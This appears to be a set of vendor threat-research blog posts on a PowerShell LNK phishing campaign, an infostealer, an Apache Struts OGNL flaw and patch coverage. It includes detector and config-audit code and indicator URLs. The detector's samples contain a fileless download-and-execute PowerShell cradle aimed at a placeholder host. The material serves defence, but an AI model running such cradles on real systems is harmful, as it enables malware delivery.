Botnets Targeting Obsolete Software

Overview: This is not a disclosure of a new vulnerability in SonicWall software. Customers with the current SonicWall Global Management System (GMS) 8.2 and above have nothing to worry about. The reported vulnerability relates to an old version of GMS (8.1), which was replaced in December 2016. Customers with GMS 8.1 and earlier releases should patch, per SonicWall guidance, as they are running out-of-support software. Best practice is to deploy a SonicWall next-generation firewall (NGFW) or a web application firewall (WAF) in front of GMS and other web servers to protect against such attacks. Look for global third-party validation on protection effectiveness, such as the 2018 NSS Labs NGFW Group Test. After rigorous testing, SonicWall firewalls earned the NSS Labs coveted ‘Recommended’ rating five times.


On Sept. 9, Palo Alto Networks Unit 42 published a blog post highlighting a developing trend of botnets picking up publicly known CVE exploits and weaponizing them against enterprise infrastructure. This marks a change in the botnet authors’ tactics from targeting consumer-grade routers and IP cameras to searching for higher-profile enterprise targets to harness additional endpoints for DDoS attacks.

The first botnet, Mirai, targeted the Apache Struts vulnerability from early 2017, which affects web servers around the world. On March 6, 2017, SonicWall provided protection against the Apache Struts vulnerability with the Intrusion Prevention Service (IPS) on the NGFW line, rolling out protection to all firewalls with licensed IPS service.

The second botnet highlighted in the Palo Alto Networks post, Gafgyt, picked up the Metasploit code for an XML-RPC vulnerability for an obsolete version of SonicWall GMS (8.1) central management software, which was replaced by GMS 8.2 in December 2016.

The bottom line: the reported botnet attack is misguided and presents no threat to SonicWall GMS in production since December 2016.

Implementing Cybersecurity Best Practices

Current SonicWall GMS users are not at risk. However, there are broader lessons here for the industry and business owners:

  • Take End-of-Life and End-of-Support announcements seriously and update proactively. Unsupported systems become a security risk for critical infrastructure and compromise an enterprise’s compliance and governance posture.
  • Security best practices dictate that you never expose a web server directly to the internet without an NGFW or WAF deployed in front of it.
  • A security layer between the internet and critical enterprise infrastructure, like web servers or centralized firewall management, provides the ability to virtually patch zero-day vulnerabilities and exploits while working out a sensible patching strategy. For example, a SonicWall NGFW with Intrusion Prevention or a SonicWall WAF can easily handle this task.

Using Third-Party Validation

The blog post does, however, underscore the rapidly-evolving nature of today’s threat landscape, evidenced by the mixing of malware and exploits to create new malware cocktails, and the need to use the latest and most effective security solutions to protect against them.

When selecting a product to protect your critical infrastructure, go beyond listening to vendor claims and look at globally recognized independent testing, such as the NSS Labs NGFW report, to validate security efficacy. Items that you should consider when selecting a security product for the modern threat landscape:

  1. NSS Labs specifically tests for protection on non-standard ports (not just 80/443, for example) because malware often uses non-standard ports to bypass traffic inspection. Products that lack inspection on non-standard ports are blind to many malware attacks, and are easily fooled into missing dangerous traffic and allowing malware and exploits to sail right through.

2018 NSS Labs NGFW Group Test Report — Evasion Resistance

2018 NSS Labs Next Generation Firewall Security Value Map™ (SVM)

  2. Evaluate your NGFW on security efficacy and on how it deals with malware cocktails, such as those built on the recently exposed Intel-based, processor-level vulnerabilities like Spectre, Meltdown and Foreshadow.
  • SonicWall patented and patent-pending Real-Time Deep Memory Inspection (RTDMI™) technology is proven to catch chip/processor attacks through its unique approach to real-time memory inspection.
  • SonicWall RTDMI protection can also be applied to mitigate malicious PDFs, Microsoft Office documents and executables. The focus on PDF and Office document protection is especially important. Attacks are shifting into this delivery mechanism as browsers clamped down on Flash and Java content, drying up a fertile area of exploit and malware delivery. For example, RTDMI discovered more than 12,300 never-before-seen attack variants in the first half of 2018 alone.
  • The SonicWall Capture Client endpoint suite plugs into the RTDMI engine to offer the same protection for users that are outside a protected network.


The Bottom Line

The reported botnet attack is misguided and presents no threat to SonicWall GMS in production since December 2016.

Microsoft Security Bulletin Coverage for September 2018

The SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of September 2018. The list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2018-0965 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8269 OData Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8271 Windows Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8315 Microsoft Scripting Engine Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8331 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8332 Win32k Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8335 Windows SMB Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8336 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8337 Windows Subsystem for Linux Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8354 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8366 Microsoft Edge Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8367 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13598 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 3
CVE-2018-8391 Scripting Engine Memory Corruption Vulnerability
IPS 13599 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 4
CVE-2018-8392 Microsoft JET Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8393 Microsoft JET Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8409 ASP.NET Core Denial of Service
There are no known exploits in the wild.
CVE-2018-8410 Windows Registry Elevation of Privilege Vulnerability
ASPY 5251 : Malformed-File exe.MP.36
CVE-2018-8419 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8420 MS XML Remote Code Execution Vulnerability
IPS 13600 : MS XML Remote Code Execution Vulnerability (SEP 18)
CVE-2018-8421 .NET Framework Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8423 Microsoft JET Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8424 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8425 Microsoft Edge Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2018-8426 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2018-8428 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8429 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8430 Word PDF Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8431 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8433 Microsoft Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8434 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8435 Windows Hyper-V Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8436 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8437 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8438 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8439 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8440 Windows ALPC Elevation of Privilege Vulnerability
GAV 2809 : Injector.PC
CVE-2018-8441 Windows Subsystem for Linux Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8442 Windows Kernel Information Disclosure Vulnerability
ASPY 5252 : Malformed-File exe.MP.37
CVE-2018-8443 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8444 Windows SMB Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8445 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8446
There are no known exploits in the wild.
CVE-2018-8447 Internet Explorer Memory Corruption Vulnerability
IPS 13601 : Internet Explorer Memory Corruption Vulnerability (SEP 18) 1
CVE-2018-8449 Device Guard Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8452 Scripting Engine Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8455 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8456 Scripting Engine Memory Corruption Vulnerability
IPS 13602 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 5
CVE-2018-8457 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8459 Scripting Engine Memory Corruption Vulnerability
IPS 13603 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 6
CVE-2018-8461 Internet Explorer Memory Corruption Vulnerability
IPS 13604 : Internet Explorer Memory Corruption Vulnerability (SEP 18) 2
CVE-2018-8462 DirectX Graphics Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8463 Microsoft Edge Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8464 Microsoft Edge PDF Remote Code Execution Vulnerability
ASPY 5244 : Malformed-File pdf.MP.320
CVE-2018-8465 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8466 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13594 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 1
CVE-2018-8467 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13595 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 2
CVE-2018-8468 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8469 Microsoft Edge Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8470 Internet Explorer Security Feature Bypass Vulnerability
IPS 13597 : Internet Explorer Security Feature Bypass Vulnerability (SEP 18)
CVE-2018-8474 Lync for Mac 2011 Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8475 Windows Remote Code Execution Vulnerability
ASPY 5253 : Malformed-File tif.MP.23
CVE-2018-8479 Azure IoT SDK Spoofing Vulnerability
There are no known exploits in the wild.

New Phishing Campaign Leverages Fileless PowerShell execution using LNK

SonicWall has recently spotted a new phishing email campaign spreading actively in the last few days. The malicious email, disguised as a legitimate invoice payment or FedEx receipt, delivers a RAR attachment to the targeted users. Upon extraction of the RAR file, the user sees an LNK file that looks like a legitimate document. The LNK file then executes a fileless PowerShell script that downloads an initial payload from a remote server. This initial payload then brings down multiple further payloads, runs shellcode and connects to a command and control (C&C) server, which gives the remote attacker access to the compromised computer.


Figure 1: Multi stage attack leveraging LNK files


Phishing Email Campaign: 

Phishing email is the most popular tactic for tricking users into clicking malicious content, and it is also the initial infection vector for most compromises. Attackers trick email recipients into clicking on an attachment or URL in order to infect their computer or steal information. In this campaign, a FedEx receipt or invoice payment receipt was sent to the targeted victims.

Figure 2: Phishing email used in this campaign

Emails are sent with a RAR attachment which, when extracted, delivers two LNK files.

Figure 3: LNK files extracted from the RAR attachment


LNK file:

LNK is a file extension for a shortcut file used by Microsoft Windows to point to an executable file or an application. LNK files are generally used to create start menu and desktop shortcuts. LNK stands for LiNK.

In this case, the LNK files are disguised as a legitimate document by changing the icon to one taken from the Windows image resource DLL [%SystemRoot%\System32\imageres.dll], as shown below.

Figure 4: LNK file icon has been modified to look like a legit document


Fileless PowerShell Attack:

In this version, the LNK file launches PowerShell.exe.

Figure 6: Fileless PowerShell script execution with IEX


A fileless malware attack loads malware into memory without writing it to disk. Because the file never touches the disk, file-based detection does not see it. In the PowerShell command shown above, the DownloadString method downloads the content from a remote location (‘http://dataishwar.in/ju/jjl.ps1’) into a buffer, $wcli, in memory. Even a rule that blocks execution of certain extensions such as .ps1 would not help here, because the downloaded content is run through Invoke-Expression (IEX) rather than as a script file.

The Invoke-Expression cmdlet (alias IEX) evaluates or runs a specified string as a command and returns the results of the expression.

The malicious PowerShell script is fetched from the remote location and executed from memory. It then downloads further malicious payloads to compromise the user’s machine.
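Since, as described above, an extension-based rule never sees the script, detection has to look at the PowerShell command line itself. The following is an added example (not code from this post) that scores process command lines, such as those recorded by Sysmon Event ID 1 or Windows Event 4688, for the DownloadString plus IEX cradle and the common flags around it, and also unpacks the -EncodedCommand form that hides the same script in base64; the sample command lines and URLs are constructed placeholders.

```python
"""Flag fileless PowerShell download cradles in process command lines.

Added example, not code from the SonicWall post. The sample lines below
are constructed and the URLs are placeholders.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Indicator name -> pattern. Case-insensitive because PowerShell is.
# Deliberately no '.ps1' check: the script never lands on disk, so an
# extension rule has nothing to match.
INDICATORS = [
    ("download_cradle", re.compile(r"\.DownloadString\s*\(", re.I)),
    ("invoke_expression",
     re.compile(r"(?<![\w-])(?:IEX|Invoke-Expression)(?![\w-])", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("bypass_policy", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
    ("encoded_command",
     re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
]
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script hidden behind -EncodedCommand (base64 of UTF-16LE)."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Verdict:
    cmdline: str
    matched: List[str] = field(default_factory=list)
    decoded: Optional[str] = None

    @property
    def suspicious(self) -> bool:
        # Require the cradle or IEX plus at least one more indicator, so a
        # lone Invoke-Expression in an admin script does not raise an alert.
        core = {"download_cradle", "invoke_expression"} & set(self.matched)
        return bool(core) and len(self.matched) >= 2


def analyze(cmdline: str) -> Verdict:
    """Scan the command line and, if present, the decoded -EncodedCommand body."""
    verdict = Verdict(cmdline=cmdline)
    text = cmdline
    verdict.decoded = decode_encoded_command(cmdline)
    if verdict.decoded is not None:
        text = cmdline + "\n" + verdict.decoded
    for name, pattern in INDICATORS:
        if pattern.search(text):
            verdict.matched.append(name)
    return verdict


def triage(cmdlines: List[str]) -> List[Verdict]:
    """Return only the command lines judged suspicious."""
    return [v for v in map(analyze, cmdlines) if v.suspicious]


# Constructed samples (not the campaign's real command lines).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLES = [
    # shape of the LNK-launched cradle the post describes
    "powershell.exe -w hidden -ep bypass " + _CRADLE,
    # benign administrative use
    "powershell.exe -File C:\\scripts\\backup.ps1",
    'powershell.exe Invoke-Expression "Get-Date"',
    # the same cradle hidden behind -EncodedCommand
    "powershell.exe -w hidden -enc "
    + base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii"),
]

if __name__ == "__main__":
    for v in triage(SAMPLES):
        print(", ".join(v.matched), "<-", v.cmdline[:60])
```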


Threat Graph:

The attacker appears to have compromised a legitimate site, ‘http://dataishwar.in’, and hosted malicious PowerShell scripts and payloads on it. Based on the first-seen dates of the samples, the campaign appears to have been active since July.

Figure 7: Threat intelligence graph from VirusTotal

Hash:

  • 77952875afc68bc3f5aebd99019ea9afda995a17dfb75b6d8de1bd24a70790ff

Listed below are other malicious PowerShell scripts hosted in the same website:

  • http://dataishwar.in/mlioc/ortsd.ps
    First Seen: 2018-09-04 09:08:43
  • http://dataishwar.in/yiu/orrd.ps1
    First Seen: 2018-09-02 08:04:18
  • http://dataishwar.in/mlioc/ortsd.ps1
    First Seen: 2018-09-03 08:46:29
  • http://dataishwar.in/cxs/oise.ps1
    First Seen: 2018-09-02 10:39:05

Trend Graph:

SonicWall has observed a spike in detections in the last few days.

Figure 7: Hits graph


SonicWall Threat Research Lab provides protection against this threat with the following signatures:

  • GAV 7968: Downloader.FBQH
  • IPS 13513: LNK Remote Code Execution (JUN 17) 1
  • IPS 13514: LNK Remote Code Execution (JUN 17) 2

Cyber Security News & Trends – 09-07-18

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.


SonicWall Spotlight

Cybersecurity and the future of work: How much can we predict? – Silicon Republic (Ireland)

  • SonicWall CEO Bill Conner, talking to Silicon Republic, shares his thoughts on battling the growth areas of cybercrime over the coming years.

US Indicts North Korean Over Sony, Bank and WannaCry Attacks – Infosecurity magazine

  • The U.S. Justice Department has formally charged a hacker in connection with cybercrimes that they are directly connecting to the North Korean government. SonicWall’s Bill Conner is featured as a security expert on the issue.

Cyber Security News

British Airways boss apologises for ‘malicious’ data breach – BBC

  • A week after the Air Canada security leak, another major security breach at an airline, this time British Airways, has been dominating news headlines. Names, email addresses and credit card information from over 380,000 transactions have been compromised.

Nope, the NSA isn’t sitting in front of a supercomputer hooked up to a terrorist’s hard drive – The Register

  • The Register talks about what exactly Government intelligence services want versus what it’s likely they will be able to get in the current digital climate.

The Case for a National Cybersecurity Agency – Politico

  • Gen. David Petraeus argues in Politico that national cybersecurity is in need of a complete overhaul with the creation of an independent National Cybersecurity Agency that reports directly to the President.

FIN6 returns to attack retailer point of sale systems in US, Europe – ZDNet

  • Point of Sale (POS) malware is really gathering steam. ZDNet has a report on a new campaign by a cybercriminal group called FIN6, who were previously known for selling credit card numbers on the Dark Web.

More U.S. Cities Brace for ‘Inevitable’ Hackers – The Wall Street Journal

  • After the city of Atlanta paid millions of dollars to ransomware attackers this year, other U.S. cities are considering their options on how to handle cyberattacks.

Obama-Themed Ransomware Also Mines for Monero – BankInfoSecurity

  • They’re calling it Barack Obama’s Everlasting Blue Blackmail Virus and it doubles as a cryptocurrency miner on top of being ransomware.

In Case You Missed It

Infographic: Ransomware’s Devastating Impact on Real-World Businesses

Still relatively new to the cyber threat landscape, ransomware continues to be one of the high-profile malware types that grab headlines. It’s one part Hollywood-style drama mixed with the “mystery” of cryptocurrencies and the seemingly personal nature of ransomware attacks.

But it’s not hyperbole. Ransomware remains one of the most malicious cyberattacks that can cripple a business. SonicWall’s new infographic highlights composite data that demonstrates how ransomware impacts businesses’ ability to operate.

So, how do you prevent your organization from being severely disrupted by ransomware? The best approach is to use multiple layers that deliver automated, real-time breach detection and prevention. While this isn’t an exhaustive list of all security options, these cornerstone tactics will mitigate most of today’s most malicious cyberattacks, including ransomware.

How to Block Ransomware

Businesses have no choice but to proactively mitigate ransomware attacks. But is there a proven approach that can cost-effectively scale across networks and endpoints? Four key security capabilities make full ransomware protection possible.

  1. Next-Generation Firewall

    Detect and prevent cyberattacks with power, speed and precision.
    Next-generation firewalls (NGFW) are one of your first lines of defense against hackers, cybercriminals and threat actors.

    For example, SonicWall firewalls deliver real-time, cloud-based threat prevention, while augmenting the security from on-box deep packet inspection of SSL traffic (DPI-SSL). And all new SonicWall firewalls integrate with our award-winning network sandbox for advanced threat protection.

  2. Network Sandbox

    Identify and stop unknown attacks in real time.
    A network sandbox is an isolated environment on the firewall that runs files to monitor their behavior. SonicWall Capture Advanced Threat Protection (ATP) is a multi-engine sandbox service that holds suspicious files at the gateway until a verdict can be reached.

    Capture ATP also features Real-Time Deep Memory Inspection™ (RTDMI). RTDMI is a memory-based malware analysis engine that catches more malware, and faster, than behavior-based sandboxing methods. It also delivers a lower false-positive rate to improve security and the end-user experience.

  3. Email Security

    Filter email-borne attacks before they hit your network.
    Secure email solutions deliver comprehensive inbound and outbound protection from advanced cyberattacks, including ransomware, phishing, business email compromise (BEC), spoofing, spam and viruses. Proven solutions will be available in on-premise email security appliances and hosted secure email.

    SonicWall Email Security also integrates with Capture ATP to protect email from advanced threats, such as ransomware and zero-day malware.

  4. Advanced Endpoint Client Security

    Block ransomware before it compromises user devices.
    Traditional antivirus (AV) has been trusted for years to protect computers. This was a sound approach when the total number of signatures required numbered in the hundreds of thousands. Today, millions of new forms of malware are discovered each month.

    To protect endpoints from this endless onslaught of malware attacks, SonicWall recommends using a next-generation antivirus (NGAV) solution that can monitor the behavior of a system to look for malicious activities, such as the unauthorized encryption of your files.

    For example, SonicWall Capture Client delivers advanced malware protection and additional security capabilities for SonicWall firewall

Ransomware remains one of the most damaging cyberattacks to businesses. Follow these four ransomware protection best practices to help ensure ransomware does not impact your ability to operate.

4 Ways to Protect Your Virtualized Infrastructure

Adopting a virtualized infrastructure is well established as a cost- and space-savings model, but there are additional benefits as well. Whether you are using virtual servers deployed in the cloud or on-premises, there are proven best practices to help you maintain the security posture needed to operate and protect virtual environments.

While physical appliances remain powerful workhorses, they sometimes require specific network traffic configurations to ensure they can properly protect and integrate with virtual environments.

Virtual firewalls, like the SonicWall NSv, are the No. 1 type of virtual appliance being deployed across environments. Securing an environment requires looking at all types of access and uses, such as remote access, communications and management.

SonicWall network security solutions operate and protect virtual environments in four categories:

  • Security: Network Security Virtual Firewall protects virtual environments at an intra-VLAN level.
  • Email: Email Security solution protects organizations against spam, viruses, phishing, ransomware and malware that enter through email. The solution can integrate seamlessly with Microsoft Office 365 and other on-premise and cloud email providers.
  • Remote Access: Secure Mobile Access provides anytime, anywhere access for any device to securely access an organization’s internal resources while the Web Application Firewall gives organizations the necessary controls around their forward-facing offerings.
  • Management: NSv deployments may be centrally managed using the on-premise SonicWall Global Management System (GMS) and the SonicWall Capture Security Center, an open, scalable cloud security management, monitoring, reporting and analytics software delivered as a cost-effective service offering. Capture Security Center gives the ultimate in visibility, agility and capacity to govern the entire SonicWall virtual and physical firewall ecosystem with greater clarity, precision, and speed — all from a single pane of glass.

SonicWall works diligently to ensure customers have access to best-in-class professional services delivered by Authorized Services Partners. These security solutions are optimized within virtual environments.

As Infrastructure as a Service (IaaS) offerings and cloud-based providers continue to grow, implementing trusted SonicWall platforms to protect, secure and manage your environment will allow you to grow and be more mobile through SonicWall’s virtualized product offerings.

Request a demo or trial of these products from your local partner or reach out to the Partner Enabled Services team to help you secure your virtualized environment through SonicWall Partner Enabled Services.

ECHELON infostealer spotted in the wild.

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of ECHELON [ECHELON.A] actively spreading in the wild.

The malware gathers confidential information from the computer, such as login details and passwords, and sends it to its own C&C server.

Contents of the ECHELON Malware

Infection Cycle:

The Malware adds the following file to the system:

  • Malware.exe
    • %Userprofile/Application Data\Quasar\Client.exe

The Malware adds the following keys to the Windows registry to ensure persistence upon reboot:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Quasar Client Startup
    • %Userprofile/Application Data\Quasar\Client.exe

Once the computer is compromised, the Malware copies its own executable into %Userprofile% folder and runs the following commands:

A user’s data can be very valuable to an attacker, so more data translates to more profit. The main goal of this malware is to collect as much user data as possible.

The malware performs keylogging and steals clipboard data from the target, saving it in the following file with its own encryption; here is an example:

Here is an example of encrypted file:

Here is an example of memory snapshot:


Command and Control (C&C) Traffic

ECHELON.A performs C&C communication over port 4782. The malware sends the victim’s system information to its own C&C server in the following format; here are some examples:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: ECHELON.A (Trojan)

Attackers actively exploiting Apache Struts Vulnerability

An OGNL vulnerability (CVE-2018-11776) has been discovered in Apache Struts 2. This is due to incorrect evaluation of the namespace component of a URL as an OGNL expression. This is exposed on servers running Struts under certain configurations.
This can be exploited by sending a specially crafted request to the target server. Successful exploitation will allow an attacker to execute arbitrary code with the privileges of the server.

What is Apache Struts?

Apache Struts is a free, open source Model-View-Controller (MVC) framework for building Java-based web applications. It is extensible with plugins and ships with plugins supporting REST, AJAX and JSON.

What is MVC Framework?

MVC is a software design pattern that separates the application logic from the user interface and places the control flow between the two. MVC removes the dependencies between these major components, allowing for efficient code reuse without modification.
  • Model represents data.
  • View displays model data and sends user actions to the controller.
  • Controller interprets user input and converts it to commands for the Model/View.

How to configure Struts?:

When you click on a hyperlink or submit an HTML form in a Struts 2 web application, the input is collected by the Controller and sent to a Java class called an Action. After the Action is executed, a result selects a resource to render the response. The resource is generally a JSP, but it can also be a PDF file, an Excel spreadsheet, or a Java applet window.


The struts.xml file contains the configuration information below to couple the action, view and controller.
<struts> is the root element, under which multiple packages can be defined. A package allows separation and modularization of the configuration, which is useful in a large project divided into smaller modules. Each package can have multiple actions. An action declares an action class, which contains the business logic and controls the interaction between the user, the model and the view. A namespace in Struts is a group of actions; it allows two actions with the same name but in different namespaces to behave differently.


Fig 1: A simple struts.xml without namespace


Fig 2: A simple struts.xml with namespace


Actions are accessed using Request-URIs as below:

http://<host:port>/<path>/<namespace>/<action-name>    <-- URI with namespace
http://<host:port>/<path>/<action-name>                <-- URI without namespace


Is it Vulnerable?:

When the following two conditions are true, it is likely that a Struts 2 web application is vulnerable:
  1. The flag alwaysSelectFullNamespace is set to true in the Struts configuration. Note that this is set to true if your application uses the popular Struts Convention plugin.
  2. The application uses actions that are configured without specifying a namespace, or with a wildcard namespace (e.g. “/*”). This applies to actions and namespaces specified in the Struts configuration file, but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin.
If Struts cannot find a namespace for the given action, it takes the user-supplied namespace and evaluates it as an OGNL expression, allowing the attacker to execute code remotely on the server.
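To turn the struts.xml structure described earlier and the two conditions just listed into a repeatable check, here is an added example (not SonicWall’s or the Struts project’s code) that parses a struts.xml and reports actions in packages whose namespace is missing, empty or a wildcard, together with whether full-namespace selection is enabled. It assumes the constant is spelled as Struts reads it from struts.xml, struts.mapper.alwaysSelectFullNamespace, treats a present Convention plugin as enabling the flag implicitly, and does not follow <include> files or inspect Convention annotations in Java code; the sample configuration is constructed.

```python
"""First-pass audit of a struts.xml for the two CVE-2018-11776 preconditions.

Added example, not code from the post or from the Struts project. The
struts.xml samples below are constructed.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Name of the struts.xml constant behind the post's "alwaysSelectFullNamespace".
FULL_NAMESPACE_CONSTANT = "struts.mapper.alwaysSelectFullNamespace"


def constant_value(root: ET.Element, name: str) -> Optional[str]:
    """Return the <constant name=... value=...> setting, lower-cased, or None."""
    for const in root.iter("constant"):
        if const.get("name") == name:
            return (const.get("value") or "").strip().lower()
    return None


def risky_namespace(namespace: Optional[str]) -> bool:
    """A missing, empty or wildcard namespace lets the client supply one."""
    return namespace is None or namespace.strip() == "" or "*" in namespace


def audit_struts_xml(xml_text: str, convention_plugin_present: bool = False) -> Dict:
    """Report exposed actions and whether both conditions from the post hold.

    convention_plugin_present models the note that the Convention plugin
    switches alwaysSelectFullNamespace on even without the constant.
    """
    root = ET.fromstring(xml_text)
    full_ns = (convention_plugin_present
               or constant_value(root, FULL_NAMESPACE_CONSTANT) == "true")
    exposed: List[Dict[str, Optional[str]]] = []
    for pkg in root.iter("package"):
        ns = pkg.get("namespace")
        if not risky_namespace(ns):
            continue
        for action in pkg.findall("action"):
            exposed.append({"package": pkg.get("name"),
                            "namespace": ns, "action": action.get("name")})
    return {
        "always_select_full_namespace": full_ns,
        "exposed_actions": exposed,
        # both conditions must hold for the namespace to reach OGNL
        "likely_vulnerable": full_ns and bool(exposed),
    }


# Constructed struts.xml in the shape of Fig 1/Fig 2: one package without
# a namespace, one with a wildcard namespace, one properly scoped.
SAMPLE_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="hello" class="com.example.HelloAction">
      <result>/hello.jsp</result>
    </action>
  </package>
  <package name="wild" namespace="/*" extends="struts-default">
    <action name="ping" class="com.example.PingAction">
      <result>/ping.jsp</result>
    </action>
  </package>
  <package name="secure" namespace="/secure" extends="struts-default">
    <action name="login" class="com.example.LoginAction">
      <result>/login.jsp</result>
    </action>
  </package>
</struts>
"""

# Variant without the flag, and variant with every package explicitly scoped.
NO_FLAG_STRUTS_XML = SAMPLE_STRUTS_XML.replace(
    '<constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>', "")
SCOPED_STRUTS_XML = (SAMPLE_STRUTS_XML
                     .replace('name="default" extends', 'name="default" namespace="/app" extends')
                     .replace('namespace="/*"', 'namespace="/wild"'))

if __name__ == "__main__":
    report = audit_struts_xml(SAMPLE_STRUTS_XML)
    for item in report["exposed_actions"]:
        print("exposed:", item)
    print("likely vulnerable:", report["likely_vulnerable"])
```

A clean report from this check only means the configuration-file conditions are absent; the upgrade the post recommends is still the actual fix.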

How to exploit?

OGNL is the exploit payload here.  OGNL (Object-Graph Navigation Language) is an open-source Expression Language (EL) for Java, which, while using simpler expressions than the full range of those supported by the Java language, allows getting and setting properties, and execution of methods of Java classes.

Fig 3: snippet from POC code


Find below the payload after URL encoding
Fig 4: URL encoded payload


Struts 2 web applications can be exploited by sending a crafted request like the one shown below. Vulnerable web applications interpret the namespace portion of the URI as OGNL and evaluate it without any validation.
Fig 5: URL with the injected payload
The malicious payload passed in the above URI is executed and its output is returned to the attacker. The attacker can even obtain a reverse shell on the target server using this exploit.

Trend Chart:

SonicWall has observed a huge spike in detections in the last few days. Some of our Apache OGNL signatures provided protection to our customers even before public disclosure was made.

Fig 6: Hits observed in the last 30 days

Security Patch:

Struts 2 has a history of critical security bugs, many tied to its use of the open source expression language OGNL; some of them can lead to arbitrary code execution. It was reported that Equifax’s failure to address a Struts 2 vulnerability was later exploited in a major data breach.
SonicWall recommends that customers immediately upgrade to Apache Struts version 2.5.17 or 2.3.35.

SonicWall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS 9955: Apache Struts OGNL Wildcard Remote Code Execution 1
  • IPS 8479: Apache Struts OGNL Wildcard Remote Code Execution 2
  • IPS 13574: Apache Struts OGNL Wildcard Remote Code Execution 3
  • IPS 13575: Apache Struts OGNL Wildcard Remote Code Execution 4
  • IPS 13576: Apache Struts OGNL Wildcard Remote Code Execution 5
  • WAF 1681: EXEC Statement (Possible SQL Injection)
  • WAF 9011: System Command Injection Variant 1
  • WAF 9010: System Command Access

Cyber Security News & Trends – 08-31-18

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.


SonicWall Spotlight

Air Canada Presses Reset After App Security Snafu – Infosecurity Magazine
